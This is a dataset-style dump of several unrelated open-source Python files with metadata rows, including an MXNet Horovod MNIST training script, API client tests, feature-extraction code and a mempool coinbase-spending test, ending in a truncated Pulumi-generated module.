| pre_commit/main.py | 14,543 | https://github.com/pre-commit/pre-commit/issues/217 On OSX, making a virtualenv using pyvenv at . causes `virtualenv` and `pip` to install packages to the wrong place. We don't want anything to deal with pyvenv `--config` was specified relative to the non-root working directory pragma: no cover (old git) https://stackoverflow.com/a/8521644/812183 argparse doesn't really provide a way to use a `default` subparser | 416 | en | 0.821993 |
# Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.:wq
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import argparse
import logging
import os
import zipfile
import time
import mxnet as mx
import horovod.mxnet as hvd
from mxnet import autograd, gluon, nd
from mxnet.test_utils import download
def main():
# Function to get mnist iterator given a rank
def get_mnist_iterator(rank):
data_dir = "data-%d" % rank
if not os.path.isdir(data_dir):
os.makedirs(data_dir)
zip_file_path = download('http://data.mxnet.io/mxnet/data/mnist.zip',
dirname=data_dir)
with zipfile.ZipFile(zip_file_path) as zf:
zf.extractall(data_dir)
input_shape = (1, 28, 28)
batch_size = args.batch_size
train_iter = mx.io.MNISTIter(
image="%s/train-images-idx3-ubyte" % data_dir,
label="%s/train-labels-idx1-ubyte" % data_dir,
input_shape=input_shape,
batch_size=batch_size,
shuffle=True,
flat=False,
num_parts=hvd.size(),
part_index=hvd.rank()
)
val_iter = mx.io.MNISTIter(
image="%s/t10k-images-idx3-ubyte" % data_dir,
label="%s/t10k-labels-idx1-ubyte" % data_dir,
input_shape=input_shape,
batch_size=batch_size,
flat=False,
)
return train_iter, val_iter
kernel_size = 5
strides = 2
pool_size = 2
hidden_dim = 512
output_dim = 10
activation = 'relu'
# Function to define neural network
def conv_nets():
net = gluon.nn.HybridSequential()
with net.name_scope():
net.add(gluon.nn.Conv2D(channels=20, kernel_size=kernel_size, activation=activation))
net.add(gluon.nn.MaxPool2D(pool_size=pool_size, strides=strides))
net.add(gluon.nn.Conv2D(channels=50, kernel_size=kernel_size, activation=activation))
net.add(gluon.nn.MaxPool2D(pool_size=pool_size, strides=strides))
net.add(gluon.nn.Flatten())
net.add(gluon.nn.Dense(hidden_dim, activation=activation))
net.add(gluon.nn.Dense(output_dim))
return net
# Function to evaluate accuracy for a model
def evaluate(model, data_iter, context):
data_iter.reset()
metric = mx.metric.Accuracy()
for _, batch in enumerate(data_iter):
data = batch.data[0].as_in_context(context)
label = batch.label[0].as_in_context(context)
output = model(data.astype(args.dtype, copy=False))
metric.update([label], [output])
return metric.get()
# Initialize Horovod
hvd.init()
# Horovod: pin context to local rank
context = mx.cpu(hvd.local_rank()) if args.no_cuda else mx.gpu(hvd.local_rank())
num_workers = hvd.size()
# Load training and validation data
train_data, val_data = get_mnist_iterator(hvd.rank())
# Build model
model = conv_nets()
model.cast(args.dtype)
model.hybridize()
# Create optimizer
optimizer_params = {'momentum': args.momentum,
'learning_rate': args.lr * hvd.size()}
opt = mx.optimizer.create('sgd', **optimizer_params)
# Initialize parameters
initializer = mx.init.Xavier(rnd_type='gaussian', factor_type="in",
magnitude=2)
model.initialize(initializer, ctx=context)
# Horovod: fetch and broadcast parameters
params = model.collect_params()
if params is not None:
hvd.broadcast_parameters(params, root_rank=0)
# Horovod: create DistributedTrainer, a subclass of gluon.Trainer
trainer = hvd.DistributedTrainer(params, opt)
# Create loss function and train metric
loss_fn = gluon.loss.SoftmaxCrossEntropyLoss()
metric = mx.metric.Accuracy()
# Global training timing
if hvd.rank() == 0:
global_tic = time.time()
# Train model
for epoch in range(args.epochs):
tic = time.time()
train_data.reset()
metric.reset()
for nbatch, batch in enumerate(train_data, start=1):
data = batch.data[0].as_in_context(context)
label = batch.label[0].as_in_context(context)
with autograd.record():
output = model(data.astype(args.dtype, copy=False))
loss = loss_fn(output, label)
loss.backward()
trainer.step(args.batch_size)
metric.update([label], [output])
if nbatch % 100 == 0:
name, acc = metric.get()
logging.info('[Epoch %d Batch %d] Training: %s=%f' %
(epoch, nbatch, name, acc))
if hvd.rank() == 0:
elapsed = time.time() - tic
speed = nbatch * args.batch_size * hvd.size() / elapsed
logging.info('Epoch[%d]\tSpeed=%.2f samples/s\tTime cost=%f',
epoch, speed, elapsed)
# Evaluate model accuracy
_, train_acc = metric.get()
name, val_acc = evaluate(model, val_data, context)
if hvd.rank() == 0:
logging.info('Epoch[%d]\tTrain: %s=%f\tValidation: %s=%f', epoch, name,
train_acc, name, val_acc)
if hvd.rank() == 0 and epoch == args.epochs - 1:
assert val_acc > 0.96, "Achieved accuracy (%f) is lower than expected\
(0.96)" % val_acc
if hvd.rank()==0:
global_training_time =time.time() - global_tic
print("Global elpased time on training:{}".format(global_training_time))
device = context.device_type + str(num_workers)
logging.info('Device info: %s', device)
if __name__ == "__main__":
# Handling script arguments
parser = argparse.ArgumentParser(description='MXNet MNIST Distributed Example')
parser.add_argument('--batch-size', type=int, default=64,
help='training batch size (default: 64)')
parser.add_argument('--dtype', type=str, default='float32',
help='training data type (default: float32)')
parser.add_argument('--epochs', type=int, default=5,
help='number of training epochs (default: 5)')
parser.add_argument('--lr', type=float, default=0.01,
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.9,
help='SGD momentum (default: 0.9)')
parser.add_argument('--no-cuda', action='store_true', help='disable training on GPU (default: False)')
args = parser.parse_args()
if not args.no_cuda:
# Disable CUDA if there are no GPUs.
if mx.context.num_gpus() == 0:
args.no_cuda = True
logging.basicConfig(level=logging.INFO)
logging.info(args)
main()
| test/sagemaker_tests/mxnet/training/resources/mnist/horovod_mnist.py | 7,357 | Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.:wq Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the License. A copy of the License is located at http://aws.amazon.com/apache2.0/ or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Function to get mnist iterator given a rank Function to define neural network Function to evaluate accuracy for a model Initialize Horovod Horovod: pin context to local rank Load training and validation data Build model Create optimizer Initialize parameters Horovod: fetch and broadcast parameters Horovod: create DistributedTrainer, a subclass of gluon.Trainer Create loss function and train metric Global training timing Train model Evaluate model accuracy Handling script arguments Disable CUDA if there are no GPUs. | 1,069 | en | 0.745968 |
import responses
from urllib.parse import urlencode
from tests.util import random_str
from tests.util import mock_http_response
from binance.spot import Spot as Client
from binance.error import ParameterRequiredError
mock_item = {"key_1": "value_1", "key_2": "value_2"}
key = random_str()
secret = random_str()
asset = "BNB"
amount = "100"
params = {"asset": asset}
def test_margin_asset_without_asset():
"""Tests the API endpoint to margin asset without asset"""
client = Client(key, secret)
client.margin_asset.when.called_with("").should.throw(ParameterRequiredError)
@mock_http_response(
responses.GET, "/sapi/v1/margin/asset\\?" + urlencode(params), mock_item, 200
)
def test_margin_asset():
"""Tests the API endpoint to margin asset"""
client = Client(key, secret)
response = client.margin_asset(**params)
response.should.equal(mock_item)
| tests/spot/margin/test_margin_asset.py | 888 | Tests the API endpoint to margin asset
Tests the API endpoint to margin asset without asset | 91 | en | 0.638188 |
from collections import defaultdict
class RunningAverage:
"""
Computes exponential moving averages averages.
"""
def __init__(self, mix_rate: float = 0.95):
self.mix_rate = mix_rate
self.avgs = defaultdict(lambda: None)
def record(self, name: str, value: float, ignore_nan=True):
"""
Args:
name: name of value.
value: value to record.
ignore_nan: ignore nan values and do not record them (they will mess up the averages).
"""
if ignore_nan and (value != value or value is None):
return self.avgs[name]
if self.avgs.get(name) is None:
self.avgs[name] = value
else:
self.avgs[name] = self.mix_rate * self.avgs[name] + (1-self.mix_rate) * value
return self.avgs[name]
| wrangl/metrics/running_avg.py | 833 | Computes exponential moving averages averages.
Args:
name: name of value.
value: value to record.
ignore_nan: ignore nan values and do not record them (they will mess up the averages). | 196 | en | 0.710018 |
import argparse
import torch
from pathlib import Path
import h5py
import logging
from types import SimpleNamespace
import cv2
import numpy as np
from tqdm import tqdm
import pprint
from . import extractors
from .utils.base_model import dynamic_load
from .utils.tools import map_tensor
'''
A set of standard configurations that can be directly selected from the command
line using their name. Each is a dictionary with the following entries:
- output: the name of the feature file that will be generated.
- model: the model configuration, as passed to a feature extractor.
- preprocessing: how to preprocess the images read from disk.
'''
confs = {
'superpoint_aachen': {
'output': 'feats-superpoint-n4096-r1024',
'model': {
'name': 'superpoint',
'nms_radius': 3,
'max_keypoints': 4096,
},
'preprocessing': {
'grayscale': True,
'resize_max': 1024,
},
},
'superpoint_inloc': {
'output': 'feats-superpoint-n4096-r1600',
'model': {
'name': 'superpoint',
'nms_radius': 4,
'max_keypoints': 4096,
},
'preprocessing': {
'grayscale': True,
'resize_max': 1600,
},
},
'hfnet_superpoint': {
'output': 'feats-superpoint',
'model': {
'name': 'superpoint',
'nms_radius': 4,
'max_keypoints': 4096,
},
'preprocessing': {
'grayscale': True,
'resize_max': 1600,
},
},
'd2net-ss': {
'output': 'feats-d2net-ss',
'model': {
'name': 'd2net',
'multiscale': False,
},
'preprocessing': {
'grayscale': False,
'resize_max': 1600,
},
},
}
class ImageDataset(torch.utils.data.Dataset):
default_conf = {
'globs': ['*.jpg', '*.png', '*.jpeg', '*.JPG', '*.PNG'],
'grayscale': False,
'resize_max': None,
}
def __init__(self, root, conf):
self.conf = conf = SimpleNamespace(**{**self.default_conf, **conf})
self.root = root
self.paths = []
for g in conf.globs:
self.paths += list(Path(root).glob('**/'+g))
if len(self.paths) == 0:
raise ValueError(f'Could not find any image in root: {root}.')
self.paths = sorted(list(set(self.paths)))
self.paths = [i.relative_to(root) for i in self.paths]
logging.info(f'Found {len(self.paths)} images in root {root}.')
def __getitem__(self, idx):
path = self.paths[idx]
if self.conf.grayscale:
mode = cv2.IMREAD_GRAYSCALE
else:
mode = cv2.IMREAD_COLOR
image = cv2.imread(str(self.root / path), mode)
if not self.conf.grayscale:
image = image[:, :, ::-1] # BGR to RGB
if image is None:
raise ValueError(f'Cannot read image {str(path)}.')
image = image.astype(np.float32)
size = image.shape[:2][::-1]
w, h = size
if self.conf.resize_max and max(w, h) > self.conf.resize_max:
scale = self.conf.resize_max / max(h, w)
h_new, w_new = int(round(h*scale)), int(round(w*scale))
image = cv2.resize(
image, (w_new, h_new), interpolation=cv2.INTER_LINEAR)
if self.conf.grayscale:
image = image[None]
else:
image = image.transpose((2, 0, 1)) # HxWxC to CxHxW
image = image / 255.
data = {
'name': path.as_posix(),
'image': image,
'original_size': np.array(size),
}
return data
def __len__(self):
return len(self.paths)
class FeatureExtractor(object):
def __init__(self, conf):
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
Model = dynamic_load(extractors, conf['model']['name'])
self.model = Model(conf['model']).eval().to(self.device)
def extract(self, image):
image = image.astype(np.float32)
size = image.shape[:2][::-1]
image = image.transpose((2, 0, 1)) # HxWxC to CxHxW
image = image / 255.
data = {
'image': image,
'original_size': np.array(size),
}
pred = model(map_tensor(data, lambda x: x.to(self.device)))
pred = {k: v[0].cpu().numpy() for k, v in pred.items()}
pred['image_size'] = original_size = data['original_size'][0].numpy()
if 'keypoints' in pred:
size = np.array(data['image'].shape[-2:][::-1])
scales = (original_size / size).astype(np.float32)
pred['keypoints'] = (pred['keypoints'] + .5) * scales[None] - .5
return pred
@torch.no_grad()
def main(conf, image_dir, export_dir, as_half=False):
logging.info('Extracting local features with configuration:'
f'\n{pprint.pformat(conf)}')
device = 'cuda' if torch.cuda.is_available() else 'cpu'
Model = dynamic_load(extractors, conf['model']['name'])
model = Model(conf['model']).eval().to(device)
loader = ImageDataset(image_dir, conf['preprocessing'])
loader = torch.utils.data.DataLoader(loader, num_workers=1)
feature_path = Path(export_dir, conf['output']+'.h5')
feature_path.parent.mkdir(exist_ok=True, parents=True)
feature_file = h5py.File(str(feature_path), 'a')
for data in tqdm(loader):
pred = model(map_tensor(data, lambda x: x.to(device)))
pred = {k: v[0].cpu().numpy() for k, v in pred.items()}
pred['image_size'] = original_size = data['original_size'][0].numpy()
if 'keypoints' in pred:
size = np.array(data['image'].shape[-2:][::-1])
scales = (original_size / size).astype(np.float32)
pred['keypoints'] = (pred['keypoints'] + .5) * scales[None] - .5
if as_half:
for k in pred:
dt = pred[k].dtype
if (dt == np.float32) and (dt != np.float16):
pred[k] = pred[k].astype(np.float16)
grp = feature_file.create_group(data['name'][0])
for k, v in pred.items():
grp.create_dataset(k, data=v)
del pred
feature_file.close()
logging.info('Finished exporting features.')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--image_dir', type=Path, required=True)
parser.add_argument('--export_dir', type=Path, required=True)
parser.add_argument('--conf', type=str, default='superpoint_aachen',
choices=list(confs.keys()))
args = parser.parse_args()
main(confs[args.conf], args.image_dir, args.export_dir)
| hloc/extract_features.py | 6,772 | BGR to RGB HxWxC to CxHxW HxWxC to CxHxW | 40 | en | 0.505052 |
class TokenNotFound(Exception):
"""
Indicates that a token could not be found in the database
"""
pass | backEnd/app/api/auth/exceptions.py | 118 | Indicates that a token could not be found in the database | 57 | en | 0.950246 |
import os
import unittest
from telethon.tl import TLObject
from telethon.extensions import BinaryReader
class UtilsTests(unittest.TestCase):
@staticmethod
def test_binary_writer_reader():
# Test that we can read properly
data = b'\x01\x05\x00\x00\x00\r\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x88A\x00\x00\x00\x00\x00\x009@\x1a\x1b\x1c\x1d\x1e\x1f ' \
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x00\x80'
with BinaryReader(data) as reader:
value = reader.read_byte()
assert value == 1, 'Example byte should be 1 but is {}'.format(value)
value = reader.read_int()
assert value == 5, 'Example integer should be 5 but is {}'.format(value)
value = reader.read_long()
assert value == 13, 'Example long integer should be 13 but is {}'.format(value)
value = reader.read_float()
assert value == 17.0, 'Example float should be 17.0 but is {}'.format(value)
value = reader.read_double()
assert value == 25.0, 'Example double should be 25.0 but is {}'.format(value)
value = reader.read(7)
assert value == bytes([26, 27, 28, 29, 30, 31, 32]), 'Example bytes should be {} but is {}' \
.format(bytes([26, 27, 28, 29, 30, 31, 32]), value)
value = reader.read_large_int(128, signed=False)
assert value == 2**127, 'Example large integer should be {} but is {}'.format(2**127, value)
@staticmethod
def test_binary_tgwriter_tgreader():
small_data = os.urandom(33)
small_data_padded = os.urandom(19) # +1 byte for length = 20 (%4 = 0)
large_data = os.urandom(999)
large_data_padded = os.urandom(1024)
data = (small_data, small_data_padded, large_data, large_data_padded)
string = 'Testing Telegram strings, this should work properly!'
serialized = b''.join(TLObject.serialize_bytes(d) for d in data) + \
TLObject.serialize_bytes(string)
with BinaryReader(serialized) as reader:
# And then try reading it without errors (it should be unharmed!)
for datum in data:
value = reader.tgread_bytes()
assert value == datum, 'Example bytes should be {} but is {}'.format(
datum, value)
value = reader.tgread_string()
assert value == string, 'Example string should be {} but is {}'.format(
string, value)
| telethon_tests/utils_test.py | 2,583 | Test that we can read properly +1 byte for length = 20 (%4 = 0) And then try reading it without errors (it should be unharmed!) | 127 | en | 0.726925 |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
from typing import Tuple
from unittest import mock
import numpy as np
import pytest
import torch
from flash import Trainer
from flash.__main__ import main
from flash.core.data.data_pipeline import DataPipeline
from flash.core.data.data_source import DefaultDataKeys
from flash.core.utilities.imports import _IMAGE_AVAILABLE
from flash.image import SemanticSegmentation
from flash.image.segmentation.data import SemanticSegmentationPreprocess
from tests.helpers.utils import _IMAGE_TESTING, _SERVE_TESTING
# ======== Mock functions ========
class DummyDataset(torch.utils.data.Dataset):
size: Tuple[int, int] = (224, 224)
num_classes: int = 8
def __getitem__(self, index):
return {
DefaultDataKeys.INPUT: torch.rand(3, *self.size),
DefaultDataKeys.TARGET: torch.randint(self.num_classes - 1, self.size),
}
def __len__(self) -> int:
return 10
# ==============================
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_smoke():
model = SemanticSegmentation(num_classes=1)
assert model is not None
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
@pytest.mark.parametrize("num_classes", [8, 256])
@pytest.mark.parametrize("img_shape", [(1, 3, 224, 192), (2, 3, 128, 256)])
def test_forward(num_classes, img_shape):
model = SemanticSegmentation(
num_classes=num_classes,
backbone="resnet50",
head="fpn",
)
B, C, H, W = img_shape
img = torch.rand(B, C, H, W)
out = model(img)
assert out.shape == (B, num_classes, H, W)
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_init_train(tmpdir):
model = SemanticSegmentation(num_classes=10)
train_dl = torch.utils.data.DataLoader(DummyDataset())
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
trainer.finetune(model, train_dl, strategy="freeze_unfreeze")
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_non_existent_backbone():
with pytest.raises(KeyError):
SemanticSegmentation(2, "i am never going to implement this lol")
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_freeze():
model = SemanticSegmentation(2)
model.freeze()
for p in model.backbone.parameters():
assert p.requires_grad is False
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_unfreeze():
model = SemanticSegmentation(2)
model.unfreeze()
for p in model.backbone.parameters():
assert p.requires_grad is True
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_predict_tensor():
img = torch.rand(1, 3, 64, 64)
model = SemanticSegmentation(2, backbone="mobilenetv3_large_100")
data_pipe = DataPipeline(preprocess=SemanticSegmentationPreprocess(num_classes=1))
out = model.predict(img, data_source="tensors", data_pipeline=data_pipe)
assert isinstance(out[0], list)
assert len(out[0]) == 64
assert len(out[0][0]) == 64
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_predict_numpy():
img = np.ones((1, 3, 64, 64))
model = SemanticSegmentation(2, backbone="mobilenetv3_large_100")
data_pipe = DataPipeline(preprocess=SemanticSegmentationPreprocess(num_classes=1))
out = model.predict(img, data_source="numpy", data_pipeline=data_pipe)
assert isinstance(out[0], list)
assert len(out[0]) == 64
assert len(out[0][0]) == 64
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
@pytest.mark.parametrize("jitter, args", [(torch.jit.trace, (torch.rand(1, 3, 32, 32),))])
def test_jit(tmpdir, jitter, args):
path = os.path.join(tmpdir, "test.pt")
model = SemanticSegmentation(2)
model.eval()
model = jitter(model, *args)
torch.jit.save(model, path)
model = torch.jit.load(path)
out = model(torch.rand(1, 3, 32, 32))
assert isinstance(out, torch.Tensor)
assert out.shape == torch.Size([1, 2, 32, 32])
@pytest.mark.skipif(not _SERVE_TESTING, reason="serve libraries aren't installed.")
@mock.patch("flash._IS_TESTING", True)
def test_serve():
model = SemanticSegmentation(2)
# TODO: Currently only servable once a preprocess has been attached
model._preprocess = SemanticSegmentationPreprocess()
model.eval()
model.serve()
@pytest.mark.skipif(_IMAGE_AVAILABLE, reason="image libraries are installed.")
def test_load_from_checkpoint_dependency_error():
with pytest.raises(ModuleNotFoundError, match=re.escape("'lightning-flash[image]'")):
SemanticSegmentation.load_from_checkpoint("not_a_real_checkpoint.pt")
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_available_pretrained_weights():
assert SemanticSegmentation.available_pretrained_weights("resnet18") == ["imagenet", "ssl", "swsl"]
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_cli():
cli_args = ["flash", "semantic-segmentation", "--trainer.fast_dev_run", "True"]
with mock.patch("sys.argv", cli_args):
try:
main()
except SystemExit:
pass
| tests/image/segmentation/test_model.py | 5,987 | Copyright The PyTorch Lightning team. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ======== Mock functions ======== ============================== TODO: Currently only servable once a preprocess has been attached | 689 | en | 0.865187 |
from engine.steps.IStep import IStep
from keras.models import Model
from keras import backend as K
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
class config_model(IStep):
"""config model"""
create_Optimizer_func = None
create_loss_func = None
def __init__(self, output_channel, name, create_Optimizer_func, create_loss_func):
super().__init__(self, output_channel, name)
self.create_Optimizer_func = create_Optimizer_func
self.create_loss_func = create_loss_func
def IRun(self):
if self.create_Optimizer_func == None:
raise Exception( "No create optimizer function!" )
if self.create_loss_func == None:
self.create_loss_func = self._default_categorical_crossentropy
try:
opt = self.create_Optimizer_func(self)
loss = self.create_loss_func(self)
model = self.output_channel['model']
"""
if self.train_only_top_layer:
for layer in base_model.layers:
layer.trainable = False
"""
model.compile(optimizer=opt, loss=loss, metrics=[self.metrics] )
except Exception as e:
self.output_channel['Error'] = "fatal error occur: " + e.message
self.output_channel['ErrorType'] = "fatal"
def IParseConfig( self, config_json ):
self.epochs = config_json['epochs']
self.learning_ratio = config_json['learning_ratio']
self.batch_size = config_json['batch_size']
self.metrics = config_json['metrics']
self.output_channel['epochs'] = self.epochs
self.output_channel['learning_ratio'] = self.learning_ratio
self.output_channel['batch_size'] = self.batch_size
def IDispose( self ):
pass
def _default_categorical_crossentropy():
return "categorical_crossentropy"
class config_model_adam_categorical_crossentropy(config_model):
""" config model: optimizer=Adam, loss = 'categorical_crossentropy' """
def __init__(self, output_channel, name=None ):
super().__init__(self, output_channel, name, self.create_Adam, self.create_loss )
def create_Adam( self ):
return Adam(lr=self.learning_ratio, decay=self.learning_ratio / self.epochs )
def create_loss( self ):
""" create loss function """
return "categorical_crossentropy"
| source/engine/steps/config_model.py | 2,496 | config model
config model: optimizer=Adam, loss = 'categorical_crossentropy'
create loss function | 98 | en | 0.314298 |
# coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ShowDomainQuotaResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'quotas': 'QuotaResult'
}
attribute_map = {
'quotas': 'quotas'
}
def __init__(self, quotas=None):
"""ShowDomainQuotaResponse - a model defined in huaweicloud sdk"""
super(ShowDomainQuotaResponse, self).__init__()
self._quotas = None
self.discriminator = None
if quotas is not None:
self.quotas = quotas
@property
def quotas(self):
"""Gets the quotas of this ShowDomainQuotaResponse.
:return: The quotas of this ShowDomainQuotaResponse.
:rtype: QuotaResult
"""
return self._quotas
@quotas.setter
def quotas(self, quotas):
"""Sets the quotas of this ShowDomainQuotaResponse.
:param quotas: The quotas of this ShowDomainQuotaResponse.
:type: QuotaResult
"""
self._quotas = quotas
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowDomainQuotaResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| huaweicloud-sdk-iam/huaweicloudsdkiam/v3/model/show_domain_quota_response.py | 3,079 | Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
Returns true if both objects are equal
ShowDomainQuotaResponse - a model defined in huaweicloud sdk
Returns true if both objects are not equal
For `print`
Gets the quotas of this ShowDomainQuotaResponse.
:return: The quotas of this ShowDomainQuotaResponse.
:rtype: QuotaResult
Sets the quotas of this ShowDomainQuotaResponse.
:param quotas: The quotas of this ShowDomainQuotaResponse.
:type: QuotaResult
Returns the model properties as a dict
Returns the string representation of the model
coding: utf-8 | 743 | en | 0.579125 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010-2016 PPMessage.
# Guijin Ding, dingguijin@gmail.com
#
#
from .basehandler import BaseHandler
from ppmessage.api.error import API_ERR
from ppmessage.core.constant import API_LEVEL
from ppmessage.db.models import PredefinedScript
import json
import logging
class PPMovePredefinedScriptIntoGroup(BaseHandler):
def _move(self):
_request = json.loads(self.request.body)
_group_uuid = str(_request.get("group_uuid"))
_script_uuid = _request.get("script_uuid")
if _script_uuid == None or len(_script_uuid) == 0:
self.setErrorCode(API_ERR.NO_PARA)
return
_script = redis_hash_to_dict(self.application.redis, PredefinedScript, _script_uuid)
if _script == None:
logging.error("No such script: %s" % _script_uuid)
return
_old_group_uuid = str(_script.get("group_uuid"))
_key = PredefinedScript.__tablename__ + ".group_uuid." + _old_group_uuid
self.application.redis.srem(_key, _script_uuid)
_row = PredefinedScript(uuid=_script_uuid, group_uuid=_group_uuid)
_row.async_update()
_row.update_redis_keys(self.application.redis)
return
def initialize(self):
self.addPermission(app_uuid=True)
self.addPermission(api_level=API_LEVEL.PPCONSOLE)
self.addPermission(api_level=API_LEVEL.THIRD_PARTY_CONSOLE)
return
def _Task(self):
super(PPMovePredefinedScriptIntoGroup, self)._Task()
self._move()
return
| ppmessage/api/handlers/ppmovepredefinedscriptintogroup.py | 1,573 | -*- coding: utf-8 -*- Copyright (C) 2010-2016 PPMessage. Guijin Ding, dingguijin@gmail.com | 90 | en | 0.501723 |
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test spending coinbase transactions.
The coinbase transaction in block N can appear in block
N+100... so is valid in the mempool when the best block
height is N+99.
This test makes sure coinbase spends that will be mature
in the next block are accepted into the memory pool,
but less mature coinbase spends are NOT.
"""
from test_framework.test_framework import NestcoinTestFramework
from test_framework.blocktools import create_raw_transaction
from test_framework.util import assert_equal, assert_raises_rpc_error
class MempoolSpendCoinbaseTest(NestcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
chain_height = self.nodes[0].getblockcount()
assert_equal(chain_height, 200)
node0_address = self.nodes[0].getnewaddress()
# Coinbase at height chain_height-100+1 ok in mempool, should
# get mined. Coinbase at height chain_height-100+2 is
# is too immature to spend.
b = [self.nodes[0].getblockhash(n) for n in range(101, 103)]
coinbase_txids = [self.nodes[0].getblock(h)['tx'][0] for h in b]
spends_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.99) for txid in coinbase_txids]
spend_101_id = self.nodes[0].sendrawtransaction(spends_raw[0])
# coinbase at height 102 should be too immature to spend
assert_raises_rpc_error(-26,"bad-txns-premature-spend-of-coinbase", self.nodes[0].sendrawtransaction, spends_raw[1])
# mempool should have just spend_101:
assert_equal(self.nodes[0].getrawmempool(), [ spend_101_id ])
# mine a block, spend_101 should get confirmed
self.nodes[0].generate(1)
assert_equal(set(self.nodes[0].getrawmempool()), set())
# ... and now height 102 can be spent:
spend_102_id = self.nodes[0].sendrawtransaction(spends_raw[1])
assert_equal(self.nodes[0].getrawmempool(), [ spend_102_id ])
if __name__ == '__main__':
MempoolSpendCoinbaseTest().main()
| test/functional/mempool_spend_coinbase.py | 2,321 | Test spending coinbase transactions.
The coinbase transaction in block N can appear in block
N+100... so is valid in the mempool when the best block
height is N+99.
This test makes sure coinbase spends that will be mature
in the next block are accepted into the memory pool,
but less mature coinbase spends are NOT.
!/usr/bin/env python3 Copyright (c) 2014-2018 The Bitcoin Core developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. Coinbase at height chain_height-100+1 ok in mempool, should get mined. Coinbase at height chain_height-100+2 is is too immature to spend. coinbase at height 102 should be too immature to spend mempool should have just spend_101: mine a block, spend_101 should get confirmed ... and now height 102 can be spent: | 835 | en | 0.869919 |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetSqlResourceSqlStoredProcedureResult',
'AwaitableGetSqlResourceSqlStoredProcedureResult',
'get_sql_resource_sql_stored_procedure',
]
@pulumi.output_type
class GetSqlResourceSqlStoredProcedureResult:
"""
An Azure Cosmos DB storedProcedure.
"""
